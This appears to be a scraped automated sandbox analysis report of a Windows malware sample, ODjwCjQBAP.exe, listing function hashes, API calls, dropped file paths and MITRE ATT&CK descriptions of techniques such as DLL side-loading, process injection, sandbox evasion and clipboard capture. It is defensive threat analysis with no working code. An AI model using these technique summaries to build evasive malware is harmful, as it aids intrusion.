Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
Instruction ID: 2e33bf0a2efd24b19013112e0e3dc0c5d96cbb3b8ddfa3d6198f03b0ea5f4905
Opcode Fuzzy Hash: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
Instruction Fuzzy Hash: 38A14271E00229CBDF28CFA8C8447ADBBB1FF44305F15806AD856BB281D7789A96DF44

Function 00406B78 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
Instruction ID: b6fdc69984dd60fe5839cdbb69547f11a37967466e553f406be5e4f069ddcdf3
Opcode Fuzzy Hash: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
Instruction Fuzzy Hash: 06912371E00228CBDF28CF98C8547ADBBB1FF44305F15816AD856BB291C778AA96DF44

Function 0040688E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
Instruction ID: c7cee2028620334147dbeeecb81edbae78790ee6bd2d36d3aed28758d5738f0f
Opcode Fuzzy Hash: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
Instruction Fuzzy Hash: CF813471E00228DBDF24CFA8C844BADBBB1FF44305F25816AD856BB291D7389996DF14

Function 00406393 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
Instruction ID: 57d0a4a62e73b261e138738b2685f27b9a830e1577229771e06a9dcc4a08ef7a
Opcode Fuzzy Hash: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
Instruction Fuzzy Hash: DC816771E04228DBDF24CFA8C844BADBBB1FF44315F11816AD856BB280C7786996DF44

Function 004067E1 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
Instruction ID: 7a0e56a60353855b6858f4e45cba095cd8fb81da81d2b3e1620468e36a0fecf5
Opcode Fuzzy Hash: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
Instruction Fuzzy Hash: E2710371E00228DBDF28CFA8C844BADBBB1FF44305F15806AD856BB291D7389996DF54

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
Instruction ID: 640397e2d056f1a05ee02a3664d9fcc147c5dfb75bdb54ac859d1c8af1b059c5
Opcode Fuzzy Hash: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
Instruction Fuzzy Hash: 7F712471E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB291C7789996DF48

Function 0040684B Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44

Function 00405ACF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ODjwCjQBAP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\ankomstperrons.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme\saddleback.jer

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\Overhates.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\Protaspis.sol

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\barbecue.ste

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\paradiset.cho

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsyneenes.Oms

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Freakouts.mis

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Kavalerens188.equ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Komponnkr.Tok

C:\Users\user\AppData\Local\Temp\nsm7F07.tmp

C:\Users\user\AppData\Local\Temp\nsm8A35.tmp

C:\Users\user\AppData\Local\Temp\nsp84D5.tmp

C:\Users\user\AppData\Local\Temp\nsr63EA.tmp

C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsz6B5D.tmp

C:\Users\user\AppData\Local\Temp\nsz77C3.tmp

C:\Users\user\forvredet.lnk

Static File Info

Windows Analysis Report
ODjwCjQBAP.exe

Function 004032BF Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 357
stringcomfileCOMMON

Function 0040524E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F19 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 00405799 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403C09 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403877 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D4A Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203
memoryCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00405110 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 004055D6 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Function 00406222 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Function 00405B99 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON